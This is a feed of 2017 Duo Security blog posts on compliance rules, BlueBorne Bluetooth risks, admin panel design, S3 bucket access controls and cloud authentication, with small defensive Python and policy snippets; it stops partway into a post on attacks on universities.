<![CDATA[The Duo Blog]]> https://duo.com/ Duo's Trusted Access platform verifies the identity of your users with two-factor authentication and security health of their devices before they connect to the apps you want them to access. Wed, 20 Sep 2017 10:18:00 -0400 en-us info@duosecurity.com (Amy Vazquez) Copyright 2017 3600 <![CDATA[New York Cybersecurity Regulations in Effect for Financial Services]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/new-york-cybersecurity-regulations-in-effect-for-financial-services https://duo.com/blog/new-york-cybersecurity-regulations-in-effect-for-financial-services Industry News Wed, 20 Sep 2017 10:18:00 -0400

In January, I wrote about the proposed cybersecurity regulations for New York-based banks, insurance companies and other financial services.

Now those regulations are in effect as of August 28, 2017, and companies must comply with the requirements put in place by the New York Department of Financial Services (DFS).

Additional rules will be phased into effect between 2018 and 2019, according to an article by the law firm Cadwalader, Wickersham & Taft.

Mandatory NY Cybersecurity Provisions

Mandatory provisions include:

  • Implementation of a risk-based cybersecurity program - It must have written policies and procedures and an incident response plan.
  • Designation of a Chief Information Security Officer (CISO) - This CISO must be qualified and retain security staff that can stay up-to-date with the latest threats and solutions.
  • Periodic user access assessments - By conducting a periodic review of who has access to their confidential data and networks, organizations can put limitations in place to secure that access.
  • Following the breach incident process - Organizations must report any security events to the DFS within 72 hours - including unsuccessful attacks that may raise concerns.

Upcoming Dates

If you think you might qualify for a limited exemption of the rules (less than 10 employees or $5 million in gross annual revenue, etc.), you have to apply for a Notice of Exemption by Sept. 27, 2017.

The next date to watch out for is February 15, 2018, when all DFS-regulated organizations must submit their first certification of compliance under 23 NYCRR 500.17(b).

Get the full list of key dates under NY’s Cybersecurity Regulation.

Cybersecurity Program Requirements

The regulations require many different components of a cybersecurity program - below is just a summary of each aspect:

  • Penetration Testing and Vulnerability Assessments - This requires monitoring and testing, annual penetration testing, and bi-annual vulnerability assessments.
  • Audit Trail - Audit trails must be designed to reconstruct financial transactions sufficient to support normal operations (records maintained for at least five years) and to detect security events (records maintained for at least three years)
  • Access Privileges - Limit user access privileges to information systems with confidential information, and conduct a periodic review of those privileges
  • Application Security - Must include written procedures, guidelines and standards to ensure secure development for any in-house applications developed for use by the organization; these will be managed by the CISO
  • Risk Assessment - The DFS outlines the need for periodic risk assessments to drive revisions to controls, policies and procedures for evaluating and identifying threats, risk mitigation plans and more.
  • Cybersecurity Personnel and Intelligence - Have qualified cybersecurity professionals (in-house or third party) that oversee security; update and train them on risks; ensure they maintain current knowledge of changing threats and solutions, etc.
  • Third-Party Service Provider Security Policy - Must have policies and procedures to ensure third party security, including risk assessments, minimum security standards, periodic evaluation of third party risk, etc.
  • Multi-Factor Authentication - Use effective controls, including multi-factor authentication (MFA) or risk-based authentication. MFA must be used for any user accessing internal networks from an external network.
  • Limitations on Data Retention - Include policies and procedures on the secure disposal of confidential information when it no longer is necessary to retain for business.
  • Training and Monitoring - Implement risk-based policies, procedures and controls to monitor user activity and access to data; provide regular security awareness training for all personnel.
  • Encryption of Nonpublic Information - Implement controls, including encryption, to protect data stored or in transit over external networks. There is an option to use compensating controls in exchange; they must be reviewed and approved by the CISO.
  • Incident Response Plan - Establish a written incident response plan designed to respond promptly to and recover from any event that affects the confidentiality, integrity or availability of the organization’s systems or business operations.

To see the full text and specifics of the regulations, check out the Cybersecurity Requirements for Financial Services Companies (PDF).

<![CDATA[Now Available: Healthcare Information Security Guide]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/now-available-healthcare-information-security-guide https://duo.com/blog/now-available-healthcare-information-security-guide Industry News Mon, 18 Sep 2017 09:00:00 -0400

Below is an excerpt from the introduction of a new guide released today by Duo, Healthcare Information Security - a collection of relevant articles on the latest information security themes in the healthcare industry:

Protecting access to electronic protected health information (ePHI) while increasing availability can present a significant challenge for healthcare security teams.

Enabling mobility and the use of remote services, such as telemedicine (the remote diagnosis and treatment of patients), can greatly improve the accessibility of patient care, expanding services to a wider population.

But doing so can require integrated, interoperable systems, which increase complexity and introduce security risks that may threaten the privacy and security of patient data.

Healthcare Information Security Guide from Duo

Security challenges for healthcare organizations can include:

  • Struggle to balance strong user authentication security with usability
  • Lacking effective visibility and control over the entire environment
  • Increased complexity introduced by unmanaged mobile devices such as employee-owned smartphones and tablets

Gaining an understanding of evolving themes and issues in healthcare information security today can help inform and shape your security team strategy.

In this collection of articles, you’ll learn about:

  • Key healthcare security recommendations from the newly formed HHS Cybersecurity Task Force on legacy systems, patching, strong authentication and more
  • FBI issuance of a security warning to the healthcare industry about remote File Transfer Protocol (FTP) attacks
  • The top, most likely attack vectors of interconnected EHR (electronic health record) systems
  • An overview of the OCR’s (Office for Civil Rights) guide to preventing ransomware, including basic measures to take to secure remote access to systems with ePHI
  • How to protect against potential ransomware attacks on hospital systems by gaining endpoint visibility
  • How to secure against the threat of stolen remote desktop protocol (RDP) credentials
  • The latest goals for Meaningful Use, including facilitating multi-provider care and secure sharing of patient data
  • The importance of healthcare network segmentation to enable monitoring of data
  • Information security basics that can help reduce the risk of introducing vulnerabilities, ransomware and threats to your patient data environments

Balancing the security and privacy of patient data with enabling mobility and productivity in healthcare is key.

Healthcare Information Security Guide Spread

Download the Healthcare Information Security Guide today to learn more about how to balance security while enabling user productivity, and improving patient care. And visit Duo for Healthcare to see how Duo can help secure your organization.

Download Now

<![CDATA[An Analysis of BlueBorne: Bluetooth Security Risks]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/an-analysis-of-blueborne-bluetooth-security-risks https://duo.com/blog/an-analysis-of-blueborne-bluetooth-security-risks Duo Labs Fri, 15 Sep 2017 08:00:00 -0400

On September 12, 2017, a series of Bluetooth vulnerabilities collectively referred to as BlueBorne was made public by Armis Labs. Numerous major platforms were impacted and have released patches as a result, making this a major event for businesses and regular consumers alike.

Bluetooth is a wireless communications technology comprised of dozens of protocols working in parallel and in layers, and is commonly used for short-range communication between various devices. It is often associated with the Internet of Things and those devices’ interactions with more conventional technology such as computers and smartphones.

On some platforms, parts of the Bluetooth subsystem contain vulnerabilities that range from information leakage to remote code execution. Not all platforms are vulnerable to all of the vulnerabilities, although some devices are vulnerable to more than one. The overall collection of this research, known as BlueBorne, covers these loosely-related vulnerabilities, with the idea that it stresses the underlying issue: vulnerabilities in complex codebases that are being rapidly adopted by both existing and new technologically-dependent industries.

In other words, a number of serious Bluetooth bugs were found, and the research suggests that more may exist in similar protocols in Bluetooth implementations in any number of other Bluetooth-enabled devices. These theoretical vulnerabilities are what have been driving the headlines, and they are why we wanted to address some of the concerns, as the press is making it seem like the entirety of technology is affected (it is not).

Analysis of BlueBorne Vulnerabilities

The BlueBorne vulnerabilities themselves can be broken down into groups based upon platform. There were vulnerabilities found in the Linux Bluetooth code; the Windows platform starting with Windows Vista up to and including current Microsoft offerings; older versions of Apple’s iOS; and Android versions, including the most recent.

The Linux platform contained two flaws - an information leak and a remote code execution vulnerability. The information leak is in the SDP protocol, and allows for small pieces of adjacent memory to be read by an attacker remotely. The remote code execution vulnerability is in the BlueZ library that is included in the kernel code, making for a serious vulnerability. Not only are the major flavors of Linux impacted, but devices running code based upon these libraries will also be impacted. For example, a number of Samsung devices (e.g. smart watches, TVs, refrigerators) use some of the same libraries.

The Windows platform contains a flaw allowing for IP communication to be intercepted and altered via a man-in-the-middle (MITM) attack with the Bluetooth protocol stack being the attack vector.

The Apple iOS vulnerability was a remote code execution vulnerability; however, it is not present in current versions of iOS. If your version of iOS is 10.3.3 or greater, you are not vulnerable to this issue.

The Android vulnerabilities consist of two remote code execution vulnerabilities, an information leak, and a man-in-the-middle attack similar to the Windows flaw. These can be used in conjunction with each other to “strengthen” the attack against vulnerable Android systems.

Likelihood of Attack

This involves deciding on the level of risk your device may face, taking into account the likelihood of a successful attack against it.

Bluetooth Sniffing is Hard

The BlueBorne vulnerabilities were researched in a lab environment. Duo Labs has done similar research involving Bluetooth, and we can definitively report to you that it can be quite challenging and complex. Even in a controlled environment, things may just barely work at times, and real-world application could be a serious challenge.

Think of it this way: have you ever had a dead spot in your house where something wireless did not work? For example, you can’t use the app on your phone to turn on the lights in the kitchen if you sit in the brown chair by the window. If you sit on the couch it works, but not the brown chair. The real world is filled with these little environmental areas that you don’t encounter in a lab.

Just about every presentation at a security conference involving Bluetooth includes a slide that says or mentions that Bluetooth sniffing is hard. It can be hard enough in a lab; in a real-world attack scenario, the attacker not only faces any number of brown chairs, but they have to find the exact spot on the couch. The Bluetooth signal has to be sniffed - already a challenge - and then an attack has to be launched against a potential moving target. Not easy.

Wireless Attacks Require Proximity

For any wireless attack to work, including attacks involving Bluetooth, the attacker has to be within physical proximity of the victim. This is not the classic scenario where the attacker is sitting in the middle of suburbia in a basement; for this attack to work, the attacker has to leave that basement and go physically find a victim.

As a result, it makes sense that the attacker would go where the most possible victims might be, such as a coffee shop, food court, busy conference floor, or popular sporting event - you pick. Even then, the effective range of Bluetooth narrows it down to a few dozen feet in most cases.

Non-Trivial Attack

The BlueBorne attacks are, as of this writing, non-trivial. The technical details that surround the flaws require more knowledge than your average script kiddie possesses to pull off - these vulnerabilities were released without exploit code.

An attack could make use of the Bluetooth hardware included in an average laptop, but it would greatly benefit from more powerful hardware, such as a USB Bluetooth adapter with a large antenna.

The attacks against platforms or devices that were not included in the BlueBorne release are speculative. They will require an attacker to perform non-trivial research to find them, and they are currently non-existent and theoretical. That doesn’t mean they aren’t there - any security person worth their salt will tell you they probably are - but the threat from them is not as immediate as the actual threats that have been found and reported.

Timing and The Odds

Timing is another factor. You, the potential victim, have to show up at the exact physical place that the attacker is at. At the same time. An attacker with a Liam Neeson special set of skills. And extra hardware. Who knows where the couch is, and avoids the brown chair. And you have to be there long enough for Liam to pull this off, assuming another victim doesn’t already have his attention.

Okay, we’ve had some fun exploring how likely the attack is - it is serious, but keep in mind the drive in the car to the coffee shop was much more dangerous and more likely to impact you than our friend Liam.

Mitigation of BlueBorne-Related Risks

There are two main areas of mitigation involving the BlueBorne vulnerabilities.

First and foremost, patch as soon as you are able to do so. Google has released patches for Android systems, and all partners that support regular patching are already releasing fixes for their devices. Microsoft has already released a patch, and the iOS platform is already patched if you are on a current and supported version of iOS. Linux distributions are in the process of releasing patches for their various platforms.

Your second line of defense, if you are unable to patch immediately, is to disable Bluetooth on your devices. This simple step prevents all of the vulnerabilities. If you are out and about with your unpatched phone, disable Bluetooth when you are in areas where people might congregate or other areas where you might be at risk, or simply leave it off.


While the vulnerabilities are serious, they are easy to mitigate, and patches are available from the major vendors. It is true that other vulnerabilities might exist in other products that have yet to be discovered, but that holds true for pretty much all technology.

Keep your devices patched up, disable Bluetooth if you don’t need it, and most importantly, do not feel overwhelmed by the flashy headlines screaming that everything is affected.

<![CDATA[Redesigning the Duo Admin Panel]]> rcardneau@duo.com(Ryan Williamson-Cardneau) https://duo.com/blog/redesigning-the-duo-admin-panel https://duo.com/blog/redesigning-the-duo-admin-panel Design Thu, 14 Sep 2017 08:00:00 -0400

In 2016, Duo.com received an updated look and feel from our in-house Creative team. They pushed us into a new age of design for Duo, ushering in cleaner type aesthetics, bolder graphics, and a focus on putting our messaging and content first.

While we’ve added new features and new edition names to the Admin Panel, its look and feel has lagged behind our public website. During this time, Duo.com refined its visual language, and we are now expanding on that language to build a consistent look and feel across our product.

Before: Duo.com

After: Duo.com

We’re updating the look and feel of the Admin Panel to create consistency across all touchpoints with Duo, because consistency builds trust. It matters in the language that you read, and it extends through to the visual language as well.

It can be visually jarring for a new user to go to the Duo.com site, read up on Duo, decide that they would like to sign up for a trial, land in the Admin Panel and realize that it looks nothing like Duo.com. There’s also a visual disconnect for existing customers who may receive an email about a new feature, then go to the Admin Panel to check it out. That email will likely have the new Duo.com look and feel, while the Admin Panel does not.

New Look on Duo.com

Old Look in the Duo Admin Panel

This sort of visual shift creates a mental break in workflow for the user as they reorient themselves to their new surroundings.

You could argue that this will happen regardless because the Duo.com site and the Admin Panel will always look different when it comes to where things are placed and just how much content or visual elements are on the page. And that would be a true statement. But we can mitigate this by creating a strong visual connection or language between these two entities so that the transition feels natural and the amount of time to reorient is minimal.

Visual consistency is more than just looking the same; it’s how we at Duo show that we care about how you experience all things Duo, whether you’re using our product, interacting with our marketing materials, or kicking back and watching one of our fun videos. It creates a seamless experience that proves we are serious about being the most loved brand in security.

Let’s take a look at how we achieved that consistency without changing any of the functionality you know and love. We intend to roll this out with our October new features release - sit tight and enjoy the nerdy design thoughts.


We examined the colors currently being used on Duo.com to determine what additional visual consistency we could build on from there. Even with this foundation, there are countless choices and considerations that go into choosing a color palette.

One needs to consider where the colors are going to be used, how they’re being used, the frequency with which the user sees the color, and any previous biases that may come with that color, just to name a few. With that in mind, we set out to revamp and expand our color palette in the Admin Panel, starting with the colors we were using for our text and our button/link UI (user interface) elements.

Links and Buttons

Links and buttons are the most commonly used UI elements, which means the right color choice is critical. You want the colors to be uniform enough that they feel like part of the UI’s set, while not being too overpowering, nor commanding too much attention away from the content on the page as a whole - the meat of what you want the user to consume or interact with. On top of all of that, you want to ensure that the colors you use have enough contrast so that all intended audiences can actually see them. That’s a tall order.
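As a rough illustration of that contrast requirement, accessibility checks typically apply the WCAG 2.0 contrast-ratio formula. The sketch below implements it in Python; the hex values in the examples are illustrative, not Duo's actual palette:

```python
# WCAG 2.0 contrast-ratio math: linearize each sRGB channel, compute
# relative luminance, then compare the lighter color to the darker one.
def _linear(channel):
    c = channel / 255
    return c / 12.92 if c <= 0.03928 else ((c + 0.055) / 1.055) ** 2.4

def relative_luminance(hex_color):
    hex_color = hex_color.lstrip("#")
    r, g, b = (int(hex_color[i:i + 2], 16) for i in (0, 2, 4))
    return 0.2126 * _linear(r) + 0.7152 * _linear(g) + 0.0722 * _linear(b)

def contrast_ratio(color_a, color_b):
    lighter, darker = sorted(
        (relative_luminance(color_a), relative_luminance(color_b)),
        reverse=True,
    )
    return (lighter + 0.05) / (darker + 0.05)
```

WCAG 2.0 AA calls for a ratio of at least 4.5:1 for normal body text; black on white scores the maximum of 21:1.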

Duo Base Colors

We decided on a calming blue as the default color for links, and a darker-colored text link as a backup for very specific circumstances. The blue links create contrast when placed inline with body copy to alert the user to interactive elements.

That blue is carried over into the buttons to unify the buttons and links together, building a strong pattern that when you see this blue, you can bet your bottom dollar that it’s something you can interact with. At the same time, we’re removing additional colors from our secondary buttons and our destructive buttons to help create a visual balance between the secondary navigation areas and the page content.

Graphs and a Secondary Color Palette

The second and most difficult renovation to the color palette was the creation of a secondary palette reserved for use with graphs. The challenge was striking a balance: a large set of colors that fit into the core color palette, cohesive and well-balanced enough to be mixed and matched together, but not so vibrant or dominant that they detract from the data on the page. Graphs are a visual way of conveying a set of data and should not overpower the labels or other text elements that help display that data in a text format.

This was achieved by identifying colors already in use for our color palette (such as red and green). This also includes colors that hold previously established biases through common association or existing uses in our Admin Panel — these include colors such as yellow and orange, which are commonly associated with warning or error messages, as well as a particular shade of blue that we currently use to display info messages.

Duo Graph Colors

After defining those constraints, we created a cohesive palette reserved only for use in infographics: cooler colors tinted with white to make them less visually dominant on screen.
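The "tinted with white" step can be sketched as a simple linear mix of each RGB channel toward white. The function and values below are illustrative, not Duo's actual graph palette:

```python
def tint(hex_color, amount):
    """Mix a color toward white; amount=0.0 leaves it unchanged, 1.0 gives pure white."""
    hex_color = hex_color.lstrip("#")
    channels = (int(hex_color[i:i + 2], 16) for i in (0, 2, 4))
    # Move each channel a fraction of the way toward 255 (white).
    mixed = (round(c + (255 - c) * amount) for c in channels)
    return "#{:02x}{:02x}{:02x}".format(*mixed)
```

Tinting preserves a color's hue while lowering its saturation, which is what keeps the graph colors recognizable without letting them dominate the page.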

UI Updates

Admin Panel Dashboard

The dashboard is the landing page of the Duo Admin Panel, so it’s a great place to establish UI patterns with the user. Here, we have to strike a visual balance with the general UI elements and the data overview for our administrators. We also had to take into account additional layout changes that may come to this page in the future — so it’s not just designing for the moment, but planning for a continually evolving system.

New Duo Admin Panel Dashboard

We started by eliminating the background colors that artificially broke up sections of content into blocks; these boxes added unnecessary visual clutter and made it difficult for users to quickly scan the page.


I’m sure some people have been wishing for a night mode of the Duo Admin Panel - now customers receive it by default! This change was made primarily for two reasons:

  1. The navigation should help to anchor the application to the screen while, at the same time, not hindering the readability of the content. (If you haven’t noticed, giving prominence to the content on the page is going to be a recurring theme.)
  2. Users should be able to quickly glance at the navigation and see where they are, whether the page is a child page inside of a section, and whether it has additional child pages of its own.

Duo Admin Navigation

Beyond the main navigation, we took steps toward better defining what the secondary level navigation looks like. We needed a solution that could accommodate a range of button or link types while signifying to the user that they’re actionable.

Duo Admin Secondary Nav

To this end, we opted to change the link color to grey, while only allowing the blue primary action button to persist. What this does is lower the visual footprint of the secondary navigation, allowing for flexibility when used inline with content on the page or at a top level, acting as global navigation for each page/section.

Duo Admin Secondary Nav 2

Policy Editor/Creator Modal

We decided to give considerable attention to this specific UI element. Before, we were using inconsistent visual patterns to indicate which attributes on a policy were enabled.

Duo Admin Policies

To help support a distinct and clear visual indicator of an active policy, we chose to remove the policy icons. Icons are meant to serve as shorthand for meaning. Through user testing, we found that this was not the case at all with our policy icons.

Instead, they became more visual clutter than visual cue, so we switched them to something more useful. Making them checkmarks clearly reinforces that a particular attribute has been enabled, and the addition of the “enabled” text reinforces the checkmark, as well as making it screen reader accessible. Conversely, when a policy is disabled, the checkmark is simply hidden.

The new checkmark icon and pattern is reused inside the policy modal’s left-hand navigation, simply showing whether a policy has been added and enabled or not.

The last thing we focused on was where the policy modal appears on screen. Right now, it simply centers itself on screen. This is pretty common for modals, but it wasn’t following other patterns in our admin panel.

So we took cues from how other content is visually aligned on the page and anchored the modal to the left navigation.

Anchoring it to the left navigation keeps it from floating above the interface and gives it a concrete position to live in. This allows us to mimic the layout of the page beneath the modal, creating familiarity with where the eye is supposed to go inside the modal.

Pop-Up Notifications

Now, the policy modal is not the only modal in our interface. We use pop-up notification modals for a number of activities, including confirming actions. But these modals were using their own library of icons, creating visual clutter. As a result, we’re striking the iconography that has typically been used to indicate if you were just getting an informative pop up or a warning.

Instead, we will represent destructive actions by highlighting the text in red. In the instance of a destructive modal, there will be header text that clearly defines what you are removing and highlights it by displaying it in red. Additional reinforcing text will be provided underneath to describe the action that you are about to perform. In the case of an informative pop-up, we simply do not provide the header text in red.

Red Header Text

That said, we are adding a familiar global icon to modals: the close button. Right now, we don’t provide a close button to users, which doesn’t follow best practices.

Finally, we swapped the order in which the buttons in the modal appear. Right now, the call-to-action button is typically on the right with both buttons centered in the middle of the modal. This is counterintuitive to how users typically interact with pop ups, so we moved the buttons over to align with the left edge of the copy and made the call-to-action button the first button displayed with the secondary or cancel button being displayed after it.

Duo Admin Modal

Settings Pages

The design thinking applied to the settings page was really a solution for how we present all long-form layouts in the Admin Panel. Previously, we followed the best practice of keeping labels aligned next to their respective input fields in order to build a stronger association between labels and fields. We’re not breaking away from that best practice in this redesign, but rather optimizing it for better scannability when presenting a large number of fields to the user.

Duo Admin Settings

Labels are still being kept inline with their respective fields but, instead of being right aligned to the input field, they’re left aligned. Why? It creates a hard left visual edge along the labels which allows the user’s eye to quickly follow down the list and scan each label. This means that users have an easier time finding the one attribute they need to update. Since that means the text moves slightly farther away from the input field, we added subtle borders to better break up the content into groups. This helps define some structure to the page and also helps users find a particular setting to update.


This may come across to readers as a drastic shift from what they’re used to seeing in the Duo Admin Panel, but we want to reassure you that every change we made came with the user's best interests in mind and careful consideration on our part. We hope you enjoy the update and look forward to the future improvements we plan on making. We also hope that your experience interacting with all things Duo, including our website, marketing materials, videos, Admin Panel and the Duo Prompt, is as seamless and enjoyable as possible.

<![CDATA[Securing Access to Data Stored in Amazon S3 Buckets]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/securing-access-to-data-stored-in-amazon-s3-buckets https://duo.com/blog/securing-access-to-data-stored-in-amazon-s3-buckets Industry News Tue, 12 Sep 2017 11:00:00 -0400

While ransomware appears to remain the topic du jour in the media, there’s another problem that isn’t quite as flashy but is still irreversibly damaging - misconfigured access to Amazon S3 buckets.

Basically, that refers to massive amounts of customer and/or personal data, often sensitive, left unprotected in virtual cloud storage.

What is Amazon S3?

Amazon Simple Storage Service (S3) is a virtual web storage service offered through Amazon Web Services (AWS) that allows for storing and retrieving of data from any source, including websites, mobile apps, data from interconnected devices and sensors, etc.

It can be used to collect, analyze, visualize and otherwise process very large amounts of data (i.e., exabytes - one quintillion bytes). It can be used for backup and recovery, data archiving, big data analytics, cloud storage, disaster recovery and many other use cases.

More specifically, an S3 bucket is the logical unit of storage used in AWS - buckets are used to store objects, which consist of data.

Exposing Cloud Data to the Internet

There have been countless examples of misconfigured access to these buckets containing massive amounts of sensitive data, which is significant since S3 buckets are, by default, configured for private access.

Just in the past few months alone, there have been at least half a dozen significant incidents involving the exposure of millions of personal records:

  • Twenty-five terabytes of data stored in a data analytics provider’s AWS cloud account were found unprotected, exposing information on nearly 200 million potential voters
  • A private military contractor and third-party recruiting vendor leaked job applicant information of thousands of U.S. military veterans, as well as Iraqis and Afghans working alongside the military
  • A major mobile carrier exposed 6 million customer service call records found on a publicly accessible S3 repository, administered by a third-party vendor
  • An entertainment company left three million users’ personal information on an unsecured server, in plain text
  • A worldwide publishing and financial firm exposed 2-4 million customer records on some semi-public S3 buckets
  • A large cable television provider left an unsecured AWS server containing millions of app users’ data exposed without a password

This pattern may indicate a few distinct issues in the network security of companies of all sizes and industries - either a lack of awareness of the real dangers of misconfigured access to data stored in the cloud, or a lack of insight into third-party vendors’ security practices.

Misconfigured Access to Amazon S3 Buckets

In July, a blog post by Detectify identified a few different ways they could break into websites and data due to weak configurations of S3 buckets.

Due to a common misconfiguration of S3’s Access Control Lists (ACLs), attackers can gain list and read access to a bucket’s files by using the bucket name and the AWS Command Line Interface to talk to Amazon’s API.

Network administrators often grant too much user permission to S3 buckets, allowing anyone with AWS credentials to access sensitive data, according to Threatpost.
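To make the misconfiguration concrete, here is a minimal sketch of an ACL audit check. The grant dictionaries mirror the shape returned by boto3’s `get_bucket_acl()["Grants"]`; the example ACL itself is invented, but the two group URIs are the ones AWS uses for “everyone” and “any authenticated AWS user.”

```python
# Sketch: flag S3 ACL grants that expose a bucket to the world.
# Grant dicts follow the boto3 get_bucket_acl()["Grants"] shape.

PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

def public_grants(grants):
    """Return the (URI, Permission) pairs that open the bucket to everyone."""
    return [
        (g["Grantee"]["URI"], g["Permission"])
        for g in grants
        if g["Grantee"].get("Type") == "Group"
        and g["Grantee"].get("URI") in PUBLIC_GRANTEES
    ]

# Example ACL: one safe owner grant, one risky world-readable grant.
grants = [
    {"Grantee": {"Type": "CanonicalUser", "ID": "abc123"},
     "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group",
                 "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]
print(public_grants(grants))
```

Running a check like this across every bucket’s ACL is one way to catch the “anyone can list and read” condition before an attacker does.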

How to Properly Secure Access to Data Stored in the Cloud

For Amazon S3 buckets, all resources are private by default. Only the resource owner (the AWS account that creates the resource) can access it.

By setting bucket and object access permissions, a resource owner can specify which users can access buckets and objects, as well as the type of access they can have (i.e., read-only or read and write).
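As an illustration of read-only versus read-and-write access, the sketch below builds a bucket policy that grants a single IAM role read-only access and nothing else. The account ID, role name, and bucket name are placeholders; the policy grammar follows AWS’s documented format.

```python
import json

# Sketch of a restrictive S3 bucket policy: read-only access for one
# IAM role. Account ID, role, and bucket names are hypothetical.

def read_only_policy(bucket, role_arn):
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "ReadOnlyForOneRole",
            "Effect": "Allow",
            "Principal": {"AWS": role_arn},
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": [f"arn:aws:s3:::{bucket}",
                         f"arn:aws:s3:::{bucket}/*"],
        }],
    }

policy = read_only_policy("example-records",
                          "arn:aws:iam::123456789012:role/ReportReader")
print(json.dumps(policy, indent=2))
```

Because the statement never includes `s3:PutObject` or any `Principal: "*"`, the bucket stays closed to writes and to anonymous access.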

AWS’s documentation provides more information on managing access and setting access permissions to secure Amazon S3.

As noted in a Medium article, How to Secure An Amazon S3 Bucket by Mark Nunnikhoven, VP of Cloud Research at Trend Micro, “there are multiple avenues to grant permissions” and thus “multiple areas to make simple mistakes that might cause a leak…” He recommends never allowing public access to an S3 bucket, and instead providing granular access through IAM roles.

MFA & Policies for Stronger AWS Access Security

To add an extra layer of security to your AWS accounts and protect access to your AWS resources, Amazon recommends using multi-factor authentication (MFA). Learn more about Using Multi-Factor Authentication (MFA) in AWS.

They caution that enabling MFA for root users only affects the root user credentials - other IAM (Identity and Access Management) users are distinct users with their own credentials and therefore their own MFA configurations.
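One common way to enforce this across IAM users is a deny-unless-MFA policy, using AWS’s documented `aws:MultiFactorAuthPresent` condition key. The sketch below builds such a statement as a dictionary; how and where you attach it depends on your IAM layout.

```python
import json

# Sketch of an IAM policy that denies all actions unless the caller
# authenticated with MFA. Uses AWS's aws:MultiFactorAuthPresent
# condition key; attachment scope is left to the reader.

deny_without_mfa = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenyAllWithoutMFA",
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*",
        "Condition": {
            "BoolIfExists": {"aws:MultiFactorAuthPresent": "false"}
        },
    }],
}
print(json.dumps(deny_without_mfa))
```

`BoolIfExists` (rather than plain `Bool`) also catches requests where the key is absent entirely, such as long-term access keys used without a session.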

Moving Beyond the Perimeter

In addition to adding multi-factor authentication, checking the security health of the device accessing your environment is also important. Many known vulnerabilities leverage weaknesses found in older versions of operating systems, browsers, plugins, and other software to compromise the device and gain access to your applications and data.

Device access policies can determine whether or not your users’ devices meet your minimum security standards, and allow you to block or notify users to update before being granted access.

Download part 1 and part 2 in our Moving Beyond the Perimeter white paper series to learn more about the theory and implementation behind a new approach to enterprise architecture that addresses the latest risks beyond the perimeter.

<![CDATA[Cloud Auth - Are You Doing Enough?]]> dcopley@duo.com(Doug Copley) https://duo.com/blog/cloud-auth-are-you-doing-enough https://duo.com/blog/cloud-auth-are-you-doing-enough Industry News Fri, 08 Sep 2017 08:00:00 -0400

There’s no denying that business today is done differently than when I first entered the job market. Ordering servers, waiting for them to arrive, configuring storage and networking, finding rack space in the data center - it all took time, so the time to value was significant. Enter today, where anyone can “spin up” a platform in Amazon, Google or Microsoft and have it up and running in less than 30 minutes. Certainly the cloud has decreased the time to value significantly.

But what about the access to that application? It used to be that administrators spent time configuring the server, securing the server and application, and, only when they felt all the necessary controls were in place, did they begin allowing users to authenticate to and use the application for its intended purpose.

How do those activities translate to today? Certainly there are similar steps that should be taken to set up controls such as logging, network monitoring, maybe user behavior monitoring, as well as securing the virtual server and attaching access control lists (ACLs) to resources that need to be protected. Sounds like all the same steps - and certainly with technologies such as Docker containers and the like, these processes can also be significantly accelerated, shortening that time to value even further.

But all you have to do is catch some recent headlines to know that not all companies do this well. Just this week, the résumés of over 9,000 candidates seeking government positions with Top Secret clearance were exposed because the company responsible for hosting those résumés did not properly secure access to their cloud data storage.

So when it comes to securing your cloud applications and data, how much protection is necessary? Do I just set ACLs and call it done? That should help keep bad people and bad things out, right? Do I need to track access to the applications? Do I need to put data loss prevention (DLP) in place? Do I care what devices users are using to access applications? Do I care whether the access is coming from a corporate-owned device or a personal one? These are all questions that should be answered before the server or application is ever made available.

The answer? As with most tough questions, it depends. It depends on how sensitive the application or data is that you’re trying to protect. If I’m protecting the HR data of all the employees in the company, I probably want that protected really well. If it’s information on the products a company sells, that information should be available to the public so I may only put minimal protection there. So as a CISO or CIO, I want controls that I can adapt to the level of sensitivity of the application. I don’t want to waste precious dollars and hours putting strict controls across everything when it’s not necessary. That’s a huge waste of resources.

So what about those devices? Should I care what device an end user is accessing the application from? The answer is a resounding “Yes.” Without validating the hygiene of the device, malware could be inviting itself into the application or hosting environment. Is that user’s PC vulnerable to known exploits? Is it using a Flash plugin that’s three months out of date? Is that mobile device accessing your Epic EHR jailbroken? If so, you can’t put any degree of confidence in the security posture of the device. So it’s necessary to check the hygiene of the devices that are being used to access your applications and enforce a minimum standard.

Maybe I’m front-ending the application with a virtual host such as Citrix or VMware - do I care what device they’re using then? Although it’s true that some of these technologies can “abstract” the device from the application access, doesn’t it still make sense to require stronger authentication controls for your most critical applications? It certainly makes sense to use stronger user and device authentication for critical applications such as your HR system or medical record system, especially for remote access from home or another facility.

The good news is that technology today has made this level of authentication of users and devices simple. It’s now possible to evaluate devices without the use of agents and match that with strong authentication of the user to ensure you’re providing “trusted access” to your most sensitive applications. And the user experience can be painless and require no additional equipment or fobs to carry around.

So how much cloud authentication is enough? I’ve been a strong advocate of multi-factor authentication for years, but that’s not enough when dealing with BYOD, cloud applications or even critical applications hosted in your data center but being accessed remotely. For those, you should be using strong authentication methods that verify both the user and the device.

<![CDATA[Universities Targeted by Increasing Phishing & Ransomware Attacks]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/universities-targeted-by-increasing-phishing-and-ransomware-attacks https://duo.com/blog/universities-targeted-by-increasing-phishing-and-ransomware-attacks Industry News Wed, 06 Sep 2017 08:00:00 -0400

Malicious hacking attacks against U.K. universities have doubled over the past year, from 2016 to 2017, according to an analysis of freedom of information request data by The Times.

In all, 1,152 breaches of U.K. university networks were reported last year. Attackers are targeting intellectual property, specifically, confidential information related to advanced developments in medicine, engineering and missile research, according to Computer Weekly.

This information is highly sought after by nation states; plus, this type of valuable data can be sold online to the highest bidder, as the BBC reported.

One of the reasons why the higher education sector is an easy target is due to resourcing and focus - universities may put more emphasis on academic research, rather than network protection.

While financial services companies are often targeted, they also often have larger IT and security budgets to protect business-critical financial information.

Ransomware Delivered Via Phishing

